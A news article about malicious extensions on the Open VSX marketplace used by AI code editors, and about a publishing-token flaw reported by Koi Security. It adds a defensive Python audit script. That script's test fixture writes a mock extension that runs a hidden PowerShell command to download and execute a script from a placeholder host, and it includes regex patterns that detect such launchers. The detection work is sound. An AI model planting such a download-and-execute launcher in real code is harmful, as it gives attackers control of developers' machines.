
Hackers are exploiting a dangerous loophole to target vibe coders. Cursor, Windsurf, and other AI-powered code editors can’t access the VS Code Marketplace and instead rely on riskier third-party platforms, where malicious extensions and critical flaws thrive.
Secure Annex researcher John Tuckner found a malicious extension that developers have downloaded 200,000 times. The extension targets Solidity developers, who use that programming language to implement smart contracts on Ethereum and other blockchains.
Instead of providing any useful features, the extension runs PowerShell scripts that install a remote access tool, giving attackers control of the infected computer.
“It doesn't even do anything meaningful for the user and just installs the remote access tool,” the researcher said in a blog post.
Tuckner warns vibe coders that the platforms they use currently lack basic security scanning and curation.

“No rocket science PhD was needed to analyze this extension. These extensions should have absolutely been caught by even basic security scanning and should not be available in the marketplace. If these aren't being caught, what hope is there for anything even slightly more sophisticated?” the researcher argues.
The malware was discovered on the Open VSX registry, a third-party marketplace that has grown significantly in popularity with the rise of AI code editors.
“Most of our favorite vibe editors are using Open VSX,” the researcher noted.
Used by over 8 million developers, Open VSX provides vibe coders access to extensions they couldn’t otherwise get.
Vibe coders can’t use Microsoft’s Visual Studio Marketplace in Cursor
Because of Microsoft’s terms of use, alternative code editors built on the open-source VS Code project are barred from accessing the official Visual Studio Marketplace, the go-to source of extensions for VS Code developers. That marketplace is locked to Microsoft’s own products.
“Which means editors like Cursor, Windsurf, and other VS Code forks are defaulting to other marketplaces because of this,” Tuckner explains.
The restrictions leave alternative editors with tough choices when offering extensions to users.
Open VSX emerged as an alternative marketplace without Microsoft’s restrictions, providing a lifeline for vibe coders. Here, anyone can publish extensions or download them without strings attached. Inevitably, attackers try to exploit this.
The researcher warns that this openness introduces risks not present in Microsoft’s more curated marketplace.
“While Microsoft's marketplace has its own issues, it benefits from corporate oversight, automated scanning, and review processes that help catch malicious extensions before they reach users.”
However, Open VSX reacted promptly to the disclosure: within three hours, it removed reported malicious extensions (solidityai.solidity and soliditysupport.solid) and took additional steps to deactivate their publishers.
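Because Open VSX is what Cursor and Windsurf install from, the practical check is on the developer’s own machine: which extensions are installed, whether any carry an ID already reported as malicious, and whether their JavaScript spawns PowerShell the way the Solidity extension did. The script below is an added example written for this article; it is not code from Secure Annex, Koi Security, Open VSX, or any editor vendor. The extension directories it looks in (`~/.cursor/extensions`, `~/.windsurf/extensions`, `~/.vscode/extensions`) are assumed defaults, the two bad IDs are the ones the article names, and the extension folders it audits by default are a constructed fixture built in a temporary directory so the example runs offline.

```python
"""Audit installed VS Code-style extensions for known-bad IDs and PowerShell launchers.

Added example for this article, not code from Secure Annex, Koi Security, Open VSX
or any editor. Assumptions: extension folders live under ~/.cursor/extensions,
~/.windsurf/extensions and ~/.vscode/extensions (hypothetical defaults), and each
folder holds a package.json with "publisher" and "name" fields.
"""
import json
import re
import tempfile
from pathlib import Path
from typing import Optional

# Extension IDs the article reports as removed from Open VSX.
KNOWN_BAD_IDS = {"solidityai.solidity", "soliditysupport.solid"}

# Assumed default extension locations for the editors mentioned in the article.
DEFAULT_EXTENSION_ROOTS = [Path.home() / d / "extensions" for d in (".cursor", ".windsurf", ".vscode")]

# Heuristics for the behaviour described: extension code that launches PowerShell,
# and the flags a hidden, download-and-execute launcher typically uses.
POWERSHELL_RE = re.compile(r"(?i)\b(powershell(?:\.exe)?|pwsh)\b")
SUSPICIOUS_FLAGS_RE = re.compile(
    r"(?i)-(?:enc(?:odedcommand)?|ep\s+bypass|executionpolicy\s+bypass"
    r"|w(?:indowstyle)?\s+hidden|nop(?:rofile)?)\b|downloadstring|invoke-expression|\biex\b"
)


def extension_id(pkg: dict) -> str:
    """Build the marketplace-style 'publisher.name' ID from a package.json dict."""
    return f"{pkg.get('publisher', '?')}.{pkg.get('name', '?')}".lower()


def audit_extension(ext_dir: Path) -> Optional[dict]:
    """Return a finding for one extension folder, or None if nothing is suspicious."""
    manifest = ext_dir / "package.json"
    if not manifest.is_file():
        return None
    try:
        pkg = json.loads(manifest.read_text(encoding="utf-8"))
    except (json.JSONDecodeError, OSError):
        return {"id": ext_dir.name, "path": str(ext_dir), "reasons": ["unreadable package.json"]}
    ext_id = extension_id(pkg)
    reasons = []
    if ext_id in KNOWN_BAD_IDS:
        reasons.append(f"known malicious id {ext_id}")
    # Weak signal on its own: activation code but no commands, languages, etc. offered
    # to the user, which matches "doesn't do anything meaningful for the user".
    if pkg.get("main") and not pkg.get("contributes"):
        reasons.append("has activation code but contributes nothing to the editor")
    for js in ext_dir.rglob("*.js"):
        if "node_modules" in js.parts:
            continue
        try:
            text = js.read_text(encoding="utf-8", errors="ignore")
        except OSError:
            continue
        if POWERSHELL_RE.search(text):
            flags = sorted({m.group(0).lower() for m in SUSPICIOUS_FLAGS_RE.finditer(text)})
            detail = f" with {', '.join(flags)}" if flags else ""
            reasons.append(f"{js.relative_to(ext_dir)} spawns PowerShell{detail}")
    return {"id": ext_id, "path": str(ext_dir), "reasons": reasons} if reasons else None


def audit_roots(roots) -> list:
    """Audit every extension folder under each root; missing roots are skipped."""
    findings = []
    for root in roots:
        root = Path(root)
        if not root.is_dir():
            continue
        for ext_dir in sorted(root.iterdir()):
            if ext_dir.is_dir():
                finding = audit_extension(ext_dir)
                if finding:
                    findings.append(finding)
    return findings


def build_demo_root() -> Path:
    """Constructed fixture: one extension mimicking the reported behaviour, one benign one.
    The URL and script name are placeholders, not real indicators."""
    root = Path(tempfile.mkdtemp(prefix="ext-audit-"))
    bad = root / "solidityai.solidity-1.0.0"
    bad.mkdir()
    (bad / "package.json").write_text(json.dumps(
        {"publisher": "solidityai", "name": "solidity", "main": "./extension.js"}))
    (bad / "extension.js").write_text(
        'const { exec } = require("child_process");\n'
        'exports.activate = () => exec("powershell.exe -w hidden -ep bypass -c '
        '\\"iex (New-Object Net.WebClient).DownloadString(\'http://example.invalid/x.ps1\')\\"");\n')
    good = root / "publisher.linter-2.0.0"
    good.mkdir()
    (good / "package.json").write_text(json.dumps(
        {"publisher": "publisher", "name": "linter", "main": "./extension.js",
         "contributes": {"commands": [{"command": "linter.run", "title": "Run linter"}]}}))
    (good / "extension.js").write_text('exports.activate = () => console.log("linter ready");\n')
    return root


if __name__ == "__main__":
    # Audit the constructed fixture plus whichever assumed editor roots exist here.
    for finding in audit_roots([build_demo_root()] + DEFAULT_EXTENSION_ROOTS):
        print(f"{finding['id']}  ({finding['path']})")
        for reason in finding["reasons"]:
            print(f"  - {reason}")
```

The ID match is the only high-confidence signal; the PowerShell and "contributes nothing" checks are triage hints meant to surface extensions worth reading by hand, since legitimate Windows tooling also shells out to PowerShell.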
Major Open VSX vulnerability unveiled
On June 26th, 2025, a critical flaw was discovered affecting Open VSX’s automated publishing system. Koi Security revealed that potential attackers could abuse it to gain full control of the marketplace and publish harmful updates to any extension. This could’ve compromised millions of vibe coders.
“One simple bug put millions of developers at incredible risk on a magnitude previously unseen,” Koi Security researchers said in a report.
The flawed auto-publishing mechanism exposed privileged credentials, “including a secret token of the @open-vsx service account that has the power to publish (or overwrite) any extension in the marketplace.”
“This token is a super-admin credential for the Open VSX Registry – it can publish new extensions, update or overwrite existing ones. From an attacker's perspective, that's control over an entire ecosystem's supply chain.”
The provided timeline reveals that it took six fixes and more than three months to mitigate the issue.
The Eclipse Foundation, which maintains the marketplace, found no evidence of compromise but proactively deactivated 81 extensions as a precaution.
Koi Security urges developers to treat any software downloaded from a marketplace, app store, or registry as untrusted by default.
“Our research team uncovers vulnerable and real-world malicious extensions every day in Open VSX, Microsoft’s own VSCode Marketplace, and even private enterprise marketplaces. The problem is universal: if it’s code, and it runs in your environment, it’s part of your attack surface,” the researchers said.